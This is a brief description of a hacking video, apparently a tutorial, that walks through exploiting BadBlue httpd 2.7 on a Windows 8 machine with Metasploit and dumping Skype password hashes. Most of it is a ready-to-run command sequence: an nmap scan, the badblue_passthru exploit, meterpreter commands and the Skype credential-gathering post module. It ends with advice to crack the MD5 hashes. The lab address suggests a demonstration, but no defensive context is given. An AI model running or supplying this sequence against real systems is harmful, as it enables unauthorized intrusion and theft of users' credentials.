The video shows how to dump Skype hashes using metasploit framework and the BadBlue httpd 2.7. Here are the steps:
- Exploiting Windows 8 Machine using BadBlue httpd 2.7
- Use Post Exploitation Skype module to dump the hashes
- Crack MD5 hashes, as you will not get a plain text password(s)
nmap -sS -sV 192.168.25.129 msf> use exploit/windows/http/badblue_passthru msf exploit(badblue_passthru) > set RHOST 192.168.25.129 msf exploit(badblue_passthru) > exploit meterpreter > sysinfo meterpreter > ipconfig meterpreter > background msf exploit(badblue_passthru) > search skype msf exploit(badblue_passthru) > use post/windows/gather/credentials/skype msf post(skype) > set SESSION 2 msf post(skype) > exploit
